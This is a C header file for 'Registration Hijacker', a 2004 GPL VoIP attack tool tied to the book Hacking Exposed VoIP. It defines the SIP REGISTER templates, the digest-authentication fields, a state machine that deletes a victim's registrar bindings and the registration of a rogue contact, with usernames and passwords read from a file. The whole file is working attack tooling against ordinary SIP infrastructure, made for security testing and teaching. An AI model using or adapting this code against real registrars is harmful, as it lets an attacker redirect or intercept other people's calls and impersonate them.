//-------------------------------------------------------------------------------
//
//      reghijacker.h - Registration Hijacker used to attempt
//                 to replace valid uri/user bindings in the SIP
//                 Registrar's location service with a bogus binding
//                 or binding for rogue agents. 
//
//    Copyright (C) 2004  Mark D. Collier/Mark O'Brien
//
//    This program is free software; you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation; either version 2 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program; if not, write to the Free Software
//    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
//   Author: Mark D. Collier/Mark O'Brien - 09/09/2004  v1.0
//         www.securelogix.com - mark.collier@securelogix.com
//         www.hackingexposedvoip.com
//
//-------------------------------------------------------------------------------

/* includes */
#ifndef __REGHIJACKER_H
#define __REGHIJACKER_H 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <net/if.h>             //where if_nameindex() was hiding
#include <linux/sockios.h>      //for ioctl() arg

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <sys/time.h>
#include <unistd.h>

#include <signal.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#include "global.h"
#include "md5.h"
#include "digcalc.h"

#include "hack_library.h"

#define	__REGHIJACKER_VERSION "Registration Hijacker - Version 1.0"
#define __REGHIJACKER_DATE    "                        09/09/2004"

#define	__REGHIJACKER_SIP_NON_INVITE_TIMEOUT	32	//  Timeout interval as defined by the SIP RFC 3261

#define __REGHIJACKER_REGISTER_MSG_TIMEOUT	(__REGHIJACKER_SIP_NON_INVITE_TIMEOUT + 4)

#define __REGHIJACKER_SOURCE_PORT	        15002

#define	__REGHIJACKER_SIP_PAYLOAD_LEN_MAX	2048		

char  sipPayload[__REGHIJACKER_SIP_PAYLOAD_LEN_MAX];

enum REG_HIJACKER_STATES
        {   HIJACK_REMOVE_USER_BINDINGS,
            HIJACK_REMOVE_USER_BINDINGS_AUTH,
            HIJACK_WAIT_REMOVE_BINDING_OK,
            HIJACK_REGISTER_NEW_CONTACT,
            HIJACK_REGISTER_NEW_CONTACT_AUTH,
            HIJACK_WAIT_NEW_REGISTRATION_OK,
            HIJACK_TERMINUS
        };
        
const char  METHOD_HEAD[]               = "REGISTER sip:";
const char  METHOD_TAIL[]               = " SIP/2.0\r\n";
const char  VIA_HEAD[]                  = "Via: SIP/2.0/UDP ";
const char  VIA_BRANCH[]                = ";branch=";
const char  VIA_TAIL[]                  = "\r\n";
const char  MAX_FORWARDS_HEAD[]         = "Max-Forwards: 70\r\n";
const char  TO_HEAD[]                   = "To: ";
const char  TO_TAIL[]                   = ">\r\n";
const char  FROM_HEAD[]                 = "From: ";
const char  FROM_TAIL[]                 = "\r\n";
const char  CALL_ID_HEAD[]              = "Call-ID: ";
const char  CALL_ID_TAIL[]              = "\r\n";
const char  CSEQ_HEAD[]                 = "CSeq: ";
const char  CSEQ_TAIL[]                 = " REGISTER\r\n";
const char  CONTACT_REMOVE[]            = "Contact: *\r\n";
const char  CONTACT_HEAD[]              = "Contact: <sip:";
const char  CONTACT_TAIL[]              = ">\r\n";
const char  AUTHORIZATION_HEAD[]        = "Authorization: Digest username=\"";
const char  EXPIRES_REMOVE[]            = "Expires: 0\r\n";
const char  EXPIRES_ADD[]               = "Expires: 86400\r\n";
const char  CONTENT_LEN_HEAD[]          = "Content-Length: 0\r\n";
const char  END_OF_HEADERS[]            = "\r\n";

char    hostIPv4AddrDotted[16],
        szNonceCount[9]                 = "",       // Auth parm
        registrarUri[256]               = "",       // Auth parm
        *psNonce                        = NULL,     // Auth nonce parm
        *psCNonce                       = "",       // Auth cnonce parm
        *psDevice                       = NULL,     // device interface on host
        *psDomainToHijack               = NULL,     // domain to probe
        *psDomainSipRegistrarIPv4Addr   = NULL,     // domain's SIP Proxy IPv4 addr
        *psHijackContactInfo            = NULL,
        *psQop                          = "",       // Auth qop parm
        *psUsersToHijackFilename        = NULL,     // Prospective list of usernames
        *psResultsFilename              = NULL,     // hijacking results
        *psRealm                        = NULL,     // Auth parm
        *psSleep                        = NULL,     // time to sleep
        *psUser                         = NULL,     // user being hijacked
        *psPassword                     = NULL,     // password of user being hijacked 
        *psCallID                       = NULL,     // random Call ID
        *psFromTag                      = NULL,     // random From tag
        *psBranch                       = NULL,     // random Branch tag
        *responsePayload                = NULL;

bool    bUsersFilePresent        	= false;    //  filename of Users to Probe is present
bool    bVerbose			= false;    //  verbose printing
bool    bAlreadyChallenged              = false;   
		
int     sockfd                          = 0,
        sipPayloadLen                   = 0,
        sipProxyServerIPv4Addr          = 0,
        domainSipRegistrarIPv4Addr      = 0,
        hijackerState                   = -1,
        responsePayloadLen              = 0,
        selectStatus                    = -1,
        socketReceiveBufferSize         = 32768;
        
struct      sockaddr_in  localAddress;
struct      sockaddr_in  remoteAddress;
struct      timeval      timeOut;
fd_set      socketFdSet;
socklen_t   socketAddressLength;

unsigned int    hostIPv4Addr            = 0;
unsigned int    cseq                    = 0;
unsigned long   sleepTimeUsec           = 0;

FILE *hResultFile;                      // output results file handle
FILE *hUsersToHijackFile;               // users input file handle

//  MD5 results

HASHHEX HA1;
HASHHEX HA2 = "";
HASHHEX digestResponse;

// function prototypes

bool    extractUsernameAndPassword ( char *psLine, char **psUser, char **psPassword );

void    regHijackerFSM();                //  register hijacking finite state machine

void    hijackRemoveUserBindings();
void    hijackRemoveUserBindingsAuth();
void    hijackWaitRemoveBindingOk();
void    hijackRegisterNewContact();
void    hijackRegisterNewContactAuth();
void    hijackWaitNewRegistrationOk();

void    transmitMsgAndResetTimer();      //  transmit message and reset timer for response
bool    parseChallenge();                //  parses Challenge message to identify MD5 parms
void	catch_signals(int signo);        //  signal handler
void	CleanupAndExit( int status );	 //  speaks for itself
void	usage( void );                   //  print usage (arg: program name)

#endif //  __REGHIJACKER_H
